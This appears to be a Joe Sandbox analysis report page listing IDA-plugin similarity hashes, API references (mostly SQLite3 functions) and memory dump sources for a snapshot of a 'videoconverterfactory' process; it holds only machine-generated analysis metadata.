                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$Protect$Query
                                                                                                      • String ID: @
                                                                                                      • API String ID: 3618607426-2766056989
                                                                                                      • Opcode ID: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                                                      • Instruction ID: 11fd3fd6c91f2e29dbdaed7331fdf7a08ef8f1da01c53322037319a40d79a89e
                                                                                                      • Opcode Fuzzy Hash: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                                                      • Instruction Fuzzy Hash: 003141B5E15208AFEB14DFA9D48158EFFF5EF99254F10852AE868E3310E371D940CB52
                                                                                                      APIs
                                                                                                      • sqlite3_malloc.SQLITE3 ref: 60928353
                                                                                                        • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                                                      • sqlite3_realloc.SQLITE3 ref: 609283A0
                                                                                                      • sqlite3_free.SQLITE3 ref: 609283B6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                                                                      • String ID: d
                                                                                                      • API String ID: 211589378-2564639436
                                                                                                      • Opcode ID: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                                                      • Instruction ID: 0830c2115c9ea807631a831f7f1165b0ee40d8a8a94356aa67113494a68d5982
                                                                                                      • Opcode Fuzzy Hash: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                                                      • Instruction Fuzzy Hash: 222137B0A04205CFDB14DF59D4C078ABBF6FF69314F158469D8889B309E3B8E841CBA1
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: _Jv_RegisterClasses$libgcj-11.dll
                                                                                                      • API String ID: 1646373207-2713375476
                                                                                                      • Opcode ID: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                                                      • Instruction ID: e6822cb61b404b68644b44a252d8259deade1a358cfa59fcc717d95409d4d83a
                                                                                                      • Opcode Fuzzy Hash: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                                                      • Instruction Fuzzy Hash: 0DE04F7062D30586FB443F794D923297AEB5F72549F00081CD9929B240EBB4D440D753
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 2313487548-0
                                                                                                      • Opcode ID: 17c4197e66eccf8e4e539c70c01e6b2d08fb8491bcf73b2b2b780fd64eb57762
                                                                                                      • Instruction ID: 4e09bb13dd5a3c3c1d339de95b14bc5918580ae4e3dbdcf066e72e084d482625
                                                                                                      • Opcode Fuzzy Hash: 17c4197e66eccf8e4e539c70c01e6b2d08fb8491bcf73b2b2b780fd64eb57762
                                                                                                      • Instruction Fuzzy Hash: 15E14674928209EFDB04CF94D184B9EBBB2FF69304F208558D8956B259D774EC86CF81
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: sqlite_master$sqlite_sequence$sqlite_temp_master
                                                                                                      • API String ID: 0-1177837799
                                                                                                      • Opcode ID: b45b6970ebe54efa46efcb65f0e1138f7cff2b55d537d73117a3441f01693427
                                                                                                      • Instruction ID: e5240d50caebec33bd4ce83d4b9fb982fe545a794019e3d400788b6e3ec19482
                                                                                                      • Opcode Fuzzy Hash: b45b6970ebe54efa46efcb65f0e1138f7cff2b55d537d73117a3441f01693427
                                                                                                      • Instruction Fuzzy Hash: F7C13974B062089BDB05DF68D49179EBBF3AFA8308F14C42DE8899B345DB39D841CB41
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_freesqlite3_mallocsqlite3_value_bytessqlite3_value_text
                                                                                                      • String ID:
                                                                                                      • API String ID: 1648232842-0
                                                                                                      • Opcode ID: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                                                      • Instruction ID: a01add595a6c287de5924383f0ed77e5cc34082cd65fcd393cbe5beac3228527
                                                                                                      • Opcode Fuzzy Hash: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                                                      • Instruction Fuzzy Hash: 4531C0B4A042058FDB04DF29C094B5ABBE2FF98354F1484A9EC498F349D779E846CBA0
                                                                                                      APIs
                                                                                                      • sqlite3_step.SQLITE3 ref: 609614AB
                                                                                                      • sqlite3_reset.SQLITE3 ref: 609614BF
                                                                                                        • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                                        • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                                      • sqlite3_column_int64.SQLITE3 ref: 609614D4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_column_int64sqlite3_mutex_entersqlite3_mutex_leavesqlite3_resetsqlite3_step
                                                                                                      • String ID:
                                                                                                      • API String ID: 3429445273-0
                                                                                                      • Opcode ID: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                                                      • Instruction ID: 62863439de2fabb71fd3664abc4fbfc11ff04353a6e6e3e42574d1c19fb7889d
                                                                                                      • Opcode Fuzzy Hash: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                                                      • Instruction Fuzzy Hash: AE316470A183408BEF15CF69C1C5749FBA6AFA7348F188599DC864F30AD375D884C752
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_snprintf$sqlite3_stricmpsqlite3_value_text
                                                                                                      • String ID:
                                                                                                      • API String ID: 1035992805-0
                                                                                                      • Opcode ID: 213593095aed0ecc64844f89ed1f3878beaaf7633e295caa013ed5846923251b
                                                                                                      • Instruction ID: 84d28b158f1a11e063f70be148de9c7b2eff514b3bcf7808f17aa895500be78a
                                                                                                      • Opcode Fuzzy Hash: 213593095aed0ecc64844f89ed1f3878beaaf7633e295caa013ed5846923251b
                                                                                                      • Instruction Fuzzy Hash: 8C3178B0A08324DFEB24CF28C481B4ABBF6FBA5318F04C499E4888B251C775D885DF42
                                                                                                      APIs
                                                                                                      • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 609034D8
                                                                                                      • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903521
                                                                                                      • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 6090354A
                                                                                                      • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903563
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                      • String ID:
                                                                                                      • API String ID: 1477753154-0
                                                                                                      • Opcode ID: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                                                      • Instruction ID: 848dca46e936c6e01d33e08870ae11aa620bd8b24bdb606da7ea596206f2e213
                                                                                                      • Opcode Fuzzy Hash: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                                                      • Instruction Fuzzy Hash: 44111F726186218FDB00EF7DC8817597FEAFB66308F00842DE865E7362E779D8819741
                                                                                                      APIs
                                                                                                      • sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                                                        • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                                      • sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                                                      • sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                                                      • sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_mutex_enter$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_leave
                                                                                                      • String ID:
                                                                                                      • API String ID: 2673540737-0
                                                                                                      • Opcode ID: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                                                                      • Instruction ID: c4988029ba64cfb2248a7cf0c790324acf4c13eb0f9cd3f15fdedc175ef3c91a
                                                                                                      • Opcode Fuzzy Hash: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                                                                      • Instruction Fuzzy Hash: F9019276E143148BCB00EF79D88561ABFE7FBA5324F008528EC9497364E735DC408B81
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_value_text$sqlite3_freesqlite3_load_extension
                                                                                                      • String ID:
                                                                                                      • API String ID: 3526213481-0
                                                                                                      • Opcode ID: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                                                      • Instruction ID: 98199466554994e62e20ad809be6129e3c08b78dd6d8c38fc18f61524e73aad2
                                                                                                      • Opcode Fuzzy Hash: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                                                      • Instruction Fuzzy Hash: 4101E9B5A043059BCB00EF69D485AAFBBF5EF68654F10C529EC9497304E774D841CF91
                                                                                                      APIs
                                                                                                      • sqlite3_prepare.SQLITE3 ref: 60969166
                                                                                                      • sqlite3_errmsg.SQLITE3 ref: 60969172
                                                                                                        • Part of subcall function 609258A8: sqlite3_log.SQLITE3 ref: 609258E5
                                                                                                      • sqlite3_errcode.SQLITE3 ref: 6096918A
                                                                                                        • Part of subcall function 609251AA: sqlite3_log.SQLITE3 ref: 609251E8
                                                                                                      • sqlite3_step.SQLITE3 ref: 60969197
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_log$sqlite3_errcodesqlite3_errmsgsqlite3_preparesqlite3_step
                                                                                                      • String ID:
                                                                                                      • API String ID: 2877408194-0
                                                                                                      • Opcode ID: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                                                      • Instruction ID: d4ebd4c9a05a553e526e78eaaf80584f3afcfe73b3175c4c6dada352db343273
                                                                                                      • Opcode Fuzzy Hash: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                                                      • Instruction Fuzzy Hash: 9F0186B091C3059BE700EF29C88525DFBE9EFA5314F11892DA89987384E734C940CB86
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_blobsqlite3_value_bytes
                                                                                                      • String ID:
                                                                                                      • API String ID: 1163609955-0
                                                                                                      • Opcode ID: c446836a4840d302dbdc97fcf3f25a19881b43244be54ce00609cbc101420811
                                                                                                      • Instruction ID: 8e0d1a1b7fe9adeaf330fda5a565ce202833de3a42fcd494fa905fee92021967
                                                                                                      • Opcode Fuzzy Hash: c446836a4840d302dbdc97fcf3f25a19881b43244be54ce00609cbc101420811
                                                                                                      • Instruction Fuzzy Hash: F6F0C8716282145FC3106F3994816697BE6DFA6758F0144A9F584CB314DB75CC82C742
                                                                                                      APIs
                                                                                                      • sqlite3_prepare_v2.SQLITE3 ref: 609615BA
                                                                                                      • sqlite3_step.SQLITE3 ref: 609615C9
                                                                                                      • sqlite3_column_int.SQLITE3 ref: 609615E1
                                                                                                        • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
                                                                                                      • sqlite3_finalize.SQLITE3 ref: 609615EE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_column_intsqlite3_finalizesqlite3_prepare_v2sqlite3_stepsqlite3_value_int
                                                                                                      • String ID:
                                                                                                      • API String ID: 4265739436-0
                                                                                                      • Opcode ID: edb1a347b7ee41d63e69a54b369763b34702b79c0c254a7699785c0090147395
                                                                                                      • Instruction ID: 970f7a8085286b868af170b9ae73916577c28f03d50975cfa6e3c5bd991c66ad
                                                                                                      • Opcode Fuzzy Hash: edb1a347b7ee41d63e69a54b369763b34702b79c0c254a7699785c0090147395
                                                                                                      • Instruction Fuzzy Hash: BE01E4B0D083049BEB10EF69C58575EFBF9EFA5314F00896DE8A997380E775D9408B82
                                                                                                      APIs
                                                                                                      • sqlite3_mutex_enter.SQLITE3 ref: 609084E9
                                                                                                      • sqlite3_mutex_leave.SQLITE3 ref: 60908518
                                                                                                      • sqlite3_mutex_enter.SQLITE3 ref: 60908528
                                                                                                      • sqlite3_mutex_leave.SQLITE3 ref: 6090855B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                      • String ID:
                                                                                                      • API String ID: 1477753154-0
                                                                                                      • Opcode ID: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                                                                      • Instruction ID: c41a4d3f3efa942db11cbd34a9101edfe28f26dd6f673ba1da0d5803e4a0adbd
                                                                                                      • Opcode Fuzzy Hash: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                                                                      • Instruction Fuzzy Hash: FD01A4B05093048BDB40AF25C5D97CABBA5EF15718F0884BDEC894F34AD7B9D5448BA1
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636811836.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636871267.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636909090.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_60900000_videoconverterfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: sqlite3_log
                                                                                                      • String ID: into$out of
                                                                                                      • API String ID: 632333372-1114767565
                                                                                                      • Opcode ID: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                                                      • Instruction ID: de20b162988cb891a2f8fbcf22309076e3e21d241eadb06c465d82de9f0e8d92
                                                                                                      • Opcode Fuzzy Hash: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                                                      • Instruction Fuzzy Hash: 91910170A043149BDB26CF28C88175EBBBABF65308F0481E9E858AB355D7B5DE85CF41
                                                                                                      APIs
                                                                                                        • Part of subcall function 60918408: sqlite3_value_text.SQLITE3 ref: 60918426
                                                                                                      • sqlite3_free.SQLITE3 ref: 609193A3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2636556362.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2636524145.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636690018.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2636742995.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
